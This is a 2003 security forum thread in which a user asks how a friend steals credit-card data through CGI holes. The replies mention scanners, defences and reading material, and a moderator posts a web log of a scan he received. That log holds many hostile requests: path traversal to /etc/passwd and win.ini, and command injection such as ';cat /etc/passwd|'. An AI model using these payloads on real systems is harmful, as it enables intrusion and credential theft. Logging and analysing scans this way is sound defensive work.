• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

using CGI vulnerabilities...

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses

View previous topic :: View next topic  
Author Message
mimino
Just Arrived
Just Arrived


Joined: 06 Apr 2003
Posts: 0


Offline

PostPosted: Tue Apr 08, 2003 7:48 pm    Post subject: using CGI vulnerabilities... Reply with quote

Hi , one of my friends all night long is doing something in inet , to my question he replies that he's hacking some web databases and getting the 100-Megs! of cc-s(credit cards)...I know that he's doing that using CGI vulnerabilities and exploits but he don't tell me how Twisted Evil Smile ...if anybody can describe the process of using CGI vulnerabilities like ShaolinTiger did about the proxies .....what programs to use ...from what sites.....I think it will be very interesting for all of us Wink ......
Back to top
View user's profile Send private message
Rottz
Just Arrived
Just Arrived


Joined: 29 Mar 2003
Posts: 3
Location: East Coast, USA

Offline

PostPosted: Tue Apr 08, 2003 9:03 pm    Post subject: Re: using CGI vulnerabilities... Reply with quote

mimino wrote:
Hi , one of my friends all night long is doing something in inet , to my question he replies that he's hacking some web databases and getting the 100-Megs! of cc-s(credit cards)...I know that he's doing that using CGI vulnerabilities and exploits but he don't tell me how Twisted Evil Smile ...if anybody can describe the process of using CGI vulnerabilities like ShaolinTiger did about the proxies .....what programs to use ...from what sites.....I think it will be very interesting for all of us Wink ......

Well to start with, phrack has a good paper on CGI Security Holes which will give you basic knowledge of what CGI scripts are and how they are vulnerable to abuse and attacks.
Then you'd use a program called a CGI scanner to scan for thousands of known web application holes like with Nikto or Whisker which of course are educational tools Wink
If you want to protect yourself from CGI attacks, you would use a CGI wrapper that would prevent attacks against your scripts before they ever reach them.
Also learning how to write secure CGI scripts and basic web security is always a good thing.

Knowledge is power, don't abuse it. Smile


Last edited by Rottz on Fri Apr 11, 2003 10:48 pm; edited 1 time in total
Back to top
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger
ShaolinTiger
Forum Fanatic
Forum Fanatic


Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Offline

PostPosted: Tue Apr 08, 2003 9:04 pm    Post subject: Re: using CGI vulnerabilities... Reply with quote

Rottz wrote:
Well to start with, phrack has a good paper on CGI Security Holes which will give you basic knowledge of what CGI scripts are and how they are vulnerable to abuse and attacks.
Then you'd use a program called a CGI scanner to scan for thousands of known web application holes like with Nikto or Whisker which of course are educational tools Wink
If you want to protect yourself from CGI attacks, you would use a CGI wrapper that would prevent attacks against your scripts before they ever reach them.
Also learning how to write secure CGI scripts and basic web security is always a good thing.

Knowledge is power, don't abuse it. Smile


Excellent post Rottz.

Welcome aboard, hope to see more from you.

We need more people with a clue around here Twisted Evil
Back to top
View user's profile Send private message Visit poster's website
Rottz
Just Arrived
Just Arrived


Joined: 29 Mar 2003
Posts: 3
Location: East Coast, USA

Offline

PostPosted: Tue Apr 08, 2003 9:27 pm    Post subject: Re: using CGI vulnerabilities... Reply with quote

ShaolinTiger wrote:

Excellent post Rottz.

Welcome aboard, hope to see more from you.

We need more people with a clue around here Twisted Evil


Yea, I've been lurking around here for awhile. I tried to start my own BB but its hard to start and get people active, and you've seem to already done a very good job and have almost all the bases covered well, so I guess I'll just jump aboard, no point in redoing what is already done well. Smile

Not sure how much of a "clue" I have, but I know where to get one.
Bow down to the ol mighty Google! Cool


Last edited by Rottz on Fri Apr 11, 2003 10:49 pm; edited 1 time in total
Back to top
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger
flw
Forum Fanatic
Forum Fanatic


Joined: 27 May 2002
Posts: 16777215
Location: U.S.A.

Offline

PostPosted: Tue Apr 08, 2003 9:33 pm    Post subject: Reply with quote

Rottz, nice depth in your post. Cool
Back to top
View user's profile Send private message Visit poster's website
delete852
Just Arrived
Just Arrived


Joined: 19 Nov 2002
Posts: 4
Location: Washington DC

Offline

PostPosted: Tue Apr 08, 2003 9:35 pm    Post subject: Reply with quote

google and techtutorials.com Very Happy I love that site.
Anyway welcome aboard.
Back to top
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger
Guest







PostPosted: Tue Apr 08, 2003 10:18 pm    Post subject: Re: using CGI vulnerabilities... Reply with quote

Rottz wrote:
ShaolinTiger wrote:

Excellent post Rottz.


Not sure how much of a "clue" I have, but I know where to get one.
Bow down to the ol mighty Google! Cool


Wazzzaaa Rottz Wink Yea, all bow to the allmighty google. btw, found a nice paper about google and how you can use it for your pentests Wink

http://www.digivill.net/~mowse/code/mowse-googleknowledge.pdf
Back to top
ThePsyko
SF Mod
SF Mod


Joined: 17 Oct 2002
Posts: 16777178
Location: California

Offline

PostPosted: Wed Apr 09, 2003 1:45 am    Post subject: Reply with quote

I haven't bothered to fingerprint this particular cgi scanner yet, but I found the following cgi scan in my logs last week (ip and dates removed) - it's always interesting to see what the skidiots are scanning for - I'd be willing to bet they wouldn't be able to exploit a single one of these without a tool

"GET ///server-info HTTP/1.0" 404 -
"GET ///server-status HTTP/1.0" 404 -
"HEAD /site/eg/ HTTP/1.0" 404 -
"HEAD /doc/ HTTP/1.0" 404 -
"HEAD /~nobody/ HTTP/1.0" 404 -
"GET ///manual/ HTTP/1.0" 404 -
"GET ///php/php.exe?c:\\boot.ini HTTP/1.0" 404 -
"HEAD /code/ HTTP/1.0" 404 -
"GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/test-cgi.bat?|ver HTTP/1.0" 404 -
"HEAD /error/ HTTP/1.0" 404 -
"GET /cgi-bin/ad.cgi HTTP/1.0" 404 -
"GET /cgi-bin/aglimpse HTTP/1.0" 404 -
"GET /cgi-bin/AnyForm2 HTTP/1.0" 404 -
"GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 -
"GET /cgi-bin/bsguest.cgi HTTP/1.0" 404 -
"GET /cgi-bin/bslist.cgi HTTP/1.0" 404 -
"GET /cgi-bin/campas HTTP/1.0" 404 -
"GET //carbo.dll HTTP/1.0" 404 -
"GET /cgi-bin/count.cgi HTTP/1.0" 404 -
"GET /cgi-bin/cgforum.cgi HTTP/1.0" 404 -
"GET /cgi-bin/faxsurvey HTTP/1.0" 404 -
"GET /cgi-bin/gbook.cgi HTTP/1.0" 404 -
"GET /cgi-bin/htsearch HTTP/1.0" 404 -
"GET /cgi-bin/htmlscript HTTP/1.0" 404 -
"GET /cgi-bin/jj HTTP/1.0" 404 -
"HEAD /technote/ HTTP/1.0" 404 -
"GET /cgi-bin/mmstdod.cgi HTTP/1.0" 404 -
"GET /cgi-bin/newdesk HTTP/1.0" 404 -
"GET /cgi-bin/register.cgi HTTP/1.0" 404 -
"GET /cgi-bin/simplestguest.cgi HTTP/1.0" 404 -
"GET /cgi-bin/statusconfig.pl HTTP/1.0" 404 -
"HEAD /iisadmpwd/ HTTP/1.0" 404 -
"GET /cgi-bin/webgais HTTP/1.0" 404 -
"GET /cgi-bin/perl.exe HTTP/1.0" 404 -
"HEAD /cgi-dos/ HTTP/1.0" 404 -
"HEAD /scripts/ HTTP/1.0" 404 -
"GET /cgi-bin/infosrch.cgi HTTP/1.0" 404 -
"GET /cgi-bin/rguest.exe HTTP/1.0" 404 -
"GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 -
"HEAD /Admin_files/ HTTP/1.0" 404 -
"HEAD /cgi-bin/a1stats/ HTTP/1.0" 404 -
"GET //quote.html?filename=../../../../../../../../../../../../../../../../etc/passwd&path_to_font_file=ariali.ttf HTTP/1.0" 404 -
"GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/dcboard.cgi HTTP/1.0" 404 -
"GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 -
"GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404 -
"GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 -
"HEAD /cgi-bin/ikonboard/ HTTP/1.0" 404 -
"HEAD /foldoc/ HTTP/1.0" 404 -
"HEAD /cgi-bin/adcycle/ HTTP/1.0" 404 -
"GET /cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0" 404 -
"GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 -
"GET /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 - "GET /cgi-bin/mailnews.cgi HTTP/1.0" 404 -
"GET /cgi-bin/newsdesk.cgi HTTP/1.0" 404 -
"GET /cgi-bin/pals-cgi HTTP/1.0" 404 -
"HEAD /ROADS/ HTTP/1.0" 404 -
"GET /cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0" 404 -
"HEAD /way-board/ HTTP/1.0" 404 -
"GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 -
"GET /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/get32.exe HTTP/1.0" 404 -
"GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 -
"GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 -
"GET /cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/story.pl?next=../../../etc/passwd%00 HTTP/1.0" 404 -
"GET //ftp.pl?dir=../../../../../../ HTTP/1.0" 404 -
"GET /cgi-bin/publisher/search.cgi?dir=jobs&template=;cat+/etc/passwd|&output_number=10 HTTP/1.0" 404 -
"HEAD /cowsconf/ HTTP/1.0" 404 -
"HEAD /cgi-bin/cowsconf/ HTTP/1.0" 404 -
"GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 -
"HEAD /cg-bin/ HTTP/1.0" 404 -
"GET /cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 - "GET /cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini HTTP/1.0" 404 -
"HEAD /examples/ HTTP/1.0" 404 -
"HEAD /perl/ HTTP/1.0" 404 -
Back to top
View user's profile Send private message Send e-mail
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register